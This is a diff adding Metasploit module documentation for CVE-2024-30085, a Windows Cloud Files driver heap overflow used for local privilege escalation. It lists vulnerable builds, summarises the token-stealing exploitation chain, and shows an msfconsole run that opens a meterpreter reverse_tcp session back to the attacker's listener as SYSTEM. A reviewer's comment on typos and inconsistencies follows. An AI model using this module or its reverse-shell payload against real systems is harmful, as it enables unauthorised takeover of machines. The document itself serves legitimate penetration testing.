| 1 | +## Vulnerable Application |
| 2 | +As of the writing of this documentaiton, NIST claims on https://nvd.nist.gov/vuln/detail/cve-2024-30085 that the |
| 3 | +following versions of Windows are vulnerable: |
| 4 | +``` |
| 5 | +cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:*:* |
| 6 | +Up to (excluding) 10.0.17763.5936 |
| 7 | +
|
| 8 | +cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* |
| 9 | +Up to (excluding) 10.0.19044.4529 |
| 10 | +
|
| 11 | +cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:* |
| 12 | +Up to (excluding) 10.0.19045.4529 |
| 13 | +
|
| 14 | +cpe:2.3:o:microsoft:windows_11_21h2:*:*:*:*:*:*:*:* |
| 15 | +Up to (excluding) 10.0.22000.3019 |
| 16 | +
|
| 17 | +cpe:2.3:o:microsoft:windows_11_22h2:*:*:*:*:*:*:*:* |
| 18 | +Up to (excluding) 10.0.22621.3737 |
| 19 | +
|
| 20 | +cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* |
| 21 | +Up to (excluding) 10.0.22631.3737 |
| 22 | +
|
| 23 | +cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:* |
| 24 | +Up to (excluding) 10.0.17763.5936 |
| 25 | +
|
| 26 | +cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:* |
| 27 | +Up to (excluding) 10.0.20348.2522 |
| 28 | +
|
| 29 | +cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:* |
| 30 | +Up to (excluding) 10.0.25398.950 |
| 31 | +``` |
| 32 | + |
| 33 | +In practice, this exploit did not work on Windows 10_1809, but does appear to work on Windows 10_2004, 10_20H2, and |
| 34 | +10_21H1 as well as the remaining vulnerable versions listed by NIST. |
| 35 | + |
| 36 | +CVE-2024-30085 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10, |
| 37 | +Windows 11 and Windows Server 2022. |
| 38 | + |
| 39 | +The vulnerability is a heap overflow in the Cloud Files Mini Filter Driver, a driver that facilitates |
| 40 | +management and synchronization of files between a local host and a remote server. Under certain specific |
| 41 | +circumstances, the application will not perform a check of the size when updating a file in local memory, |
| 42 | +allowing a heap overflow. |
| 43 | +By overflowing and corrupting _WNF_STATE_DATA objects, we can leak the location of the ALPC handle table and again |
| 44 | +to leak a PipeAttribute object. The PipeAttribute object then allows us to leak the location of the system process |
| 45 | +token and overwrite own on token with it. |
| 46 | +If this exploit fails, it will not work again until the target reboots. |
| 47 | + |
| 48 | +### Setup |
| 49 | + |
| 50 | +Windows 10 2004 to Windows 11 23H2 and Server 2022 through server 23H2 are vulnerable. |
| 51 | +This exploit module has been tested on Windows 10 2004 through Windows 11 23H2 10.0.22631.2428 and Server 2022 |
| 52 | +10.0.20348.169 |
| 53 | + |
| 54 | +## Verification Steps |
| 55 | + |
| 56 | +1. Start msfconsole |
| 57 | +1. Get a user level session on an affected Windows machine |
| 58 | +1. Do: `windows/local/cve_2024_30085_cloud_files` |
| 59 | +1. Set the `LHOST`, `LPORT`, and `SESSION` options |
| 60 | +1. Run the module |
| 61 | +1. Receive a session running in the context of the `NT AUTHORITY\SYSTEM` user. |
| 62 | + |
| 63 | +## Scenarios |
| 64 | +### Windows 11 (10.0 Build 22631.2428) |
| 65 | +``` |
| 66 | +msf6 exploit(windows/local/cve_2024_30085_cloud_files) > show options |
| 67 | +
|
| 68 | +Module options (exploit/windows/local/cve_2024_30085_cloud_files): |
| 69 | +
|
| 70 | + Name Current Setting Required Description |
| 71 | + ---- --------------- -------- ----------- |
| 72 | + SESSION 3 yes The session to run this module on |
| 73 | +
|
| 74 | +
|
| 75 | +Payload options (windows/x64/meterpreter/reverse_tcp): |
| 76 | +
|
| 77 | + Name Current Setting Required Description |
| 78 | + ---- --------------- -------- ----------- |
| 79 | + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) |
| 80 | + LHOST 10.5.135.201 yes The listen address (an interface may be specified) |
| 81 | + LPORT 4545 yes The listen port |
| 82 | +
|
| 83 | +
|
| 84 | +Exploit target: |
| 85 | +
|
| 86 | + Id Name |
| 87 | + -- ---- |
| 88 | + 0 Windows x64 |
| 89 | +
|
| 90 | +
|
| 91 | +
|
| 92 | +View the full module info with the info, or info -d command. |
| 93 | +
|
| 94 | +msf6 exploit(windows/local/cve_2024_30085_cloud_files) > set session 5 |
| 95 | +session => 5 |
| 96 | +msf6 exploit(windows/local/cve_2024_30085_cloud_files) > run |
| 97 | +[*] Started reverse TCP handler on 10.5.135.201:4545 |
| 98 | +[*] Running automatic check ("set AutoCheck false" to disable) |
| 99 | +[*] OS version: Windows 11 version 23H2 |
| 100 | +[+] The target appears to be vulnerable. |
| 101 | +[*] Launching notepad to host the exploit... |
| 102 | +[*] The notepad path is: C:\Windows\System32\notepad.exe |
| 103 | +[*] The notepad pid is: 4152 |
| 104 | +[*] Reflectively injecting the DLL into 4152... |
| 105 | +[*] Sending stage (203846 bytes) to 10.5.132.111 |
| 106 | +[*] Meterpreter session 6 opened (10.5.135.201:4545 -> 10.5.132.111:49800) at 2025-03-06 16:19:44 -0600 |
| 107 | +
|
| 108 | +meterpreter > sysinfo |
| 109 | +Computer : WIN11_23H2_8EA9 |
| 110 | +OS : Windows 11 (10.0 Build 22631). |
| 111 | +Architecture : x64 |
| 112 | +System Language : en_US |
| 113 | +Domain : WORKGROUP |
| 114 | +Logged On Users : 2 |
| 115 | +Meterpreter : x64/windows |
| 116 | +meterpreter > getuid |
| 117 | +Server username: NT AUTHORITY\SYSTEM |
| 118 | +``` |
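Review bot: step 3 of the Verification Steps gives only the module path (`windows/local/cve_2024_30085_cloud_files`) without the command that loads it; the other module docs use the form `use exploit/windows/local/cve_2024_30085_cloud_files`, so write it that way. The last sentence of the vulnerability description, "leak the location of the system process token and overwrite own on token with it", is garbled and should read something like "overwrite our own token with it"; "documentaiton" in the first paragraph is a typo. The Scenarios transcript is also internally inconsistent: `show options` reports `SESSION 3` but the run then does `set session 5`, so either trim the `show options` output to the same session or note that the session was changed. Finally, the caveat that a failed run "will not work again until the target reboots" deserves a sentence on why (the heap state left behind after a failed overflow) and belongs in the Setup section as well, since it is the one thing an operator must know before running the module.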